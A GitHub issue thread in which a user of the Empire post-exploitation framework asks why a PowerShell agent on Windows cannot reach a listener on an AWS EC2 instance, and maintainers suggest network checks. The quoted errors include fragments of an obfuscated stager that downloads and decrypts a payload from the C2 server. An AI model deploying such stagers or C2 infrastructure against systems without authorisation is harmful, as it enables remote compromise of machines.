### ISSUE TITLE
Unable to get agent to connect

### ISSUE THREAD

**Issue by Pilly170** [EmpireProject/Empire#1077]
## Empire Version
Latest cloned 15/04/18

## OS Information (Linux flavor, Python version)
Testing on Ubuntu on AWS EC2

Using Launcher (Powershell) or Stager

`
PS C:\files> Exception calling "DownloadData" with "1" argument(s): "The request was aborted: The operation has timed out."
At line:1 char:1669
+ ... 6/8cW6tKaDTNS4c3rrEDgH/P3s=");$DatA=$WC.DOwNlOADDATA($SER+$T);$Iv=$Da ...
+                                   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : WebException

Cannot index into a null array.
At line:1 char:1701
+ ... rrEDgH/P3s=");$DatA=$WC.DOwNlOADDATA($SER+$T);$Iv=$Data[0..3];$DATa=$ ...
+                                                   ~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : NullArray

Cannot index into a null array.
At line:1 char:1717
+ ... OADDATA($SER+$T);$Iv=$Data[0..3];$DATa=$data[4..$data.length];-join[C ...
+                                      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : NullArray

Ü : The term 'Ü' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the
spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ Ü
+ ~
    + CategoryInfo          : ObjectNotFound: (Ü:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
`

**Comment by Pilly170** [comment]
ok, I've rebuilt the instance. Initially due to subnet was reason for me being unable to connect.
Still unable to use the bindIP (to the public IP)

[!] Listener startup on port 8080 failed: [Errno 99] Cannot assign requested address
[!] Listener startup on port 8080 failed: [Errno 99] Cannot assign requested address
[!] Ensure the folder specified in CertPath exists and contains your pem and private key file.
[!] Listener failed to start!

**Comment by mr64bit** [comment]
Looking at the first error, your launcher timed out when trying to connect to your Empire server. All the other errors are byproducts of the first one.
Can you go to your http listener URL in a web browser? You should see an IIS landing page. If not, check that you're connecting to the correct port, and that you're letting traffic on that port to your EC2 instance.

**Comment by Pilly170** [comment]
Hi
Yes I am able to see the IIS landing page

**Comment by mr64bit** [comment]
Just to be sure, can you confirm that the URL in your stager is the same one you went to in your browser?
(I don't believe the listener automatically updates its URL to the listening port anymore, so you can use NAT)
Also, any proxy between you and the internet?

**Comment by mr64bit** [comment]
Interesting.
Can you run the Empire server with "--debug 2" to make sure nothing is being thrown there?

Try using cURL or Invoke-WebRequest to connect to your listener URL.

**Comment by xorrior** [comment]
@Pilly170 I would suggest some additional troubleshooting to narrow down the root cause of this. There is no way to definitely tell you what would cause an agent timeout w/o some additional information. Once you have some more info, let us know.
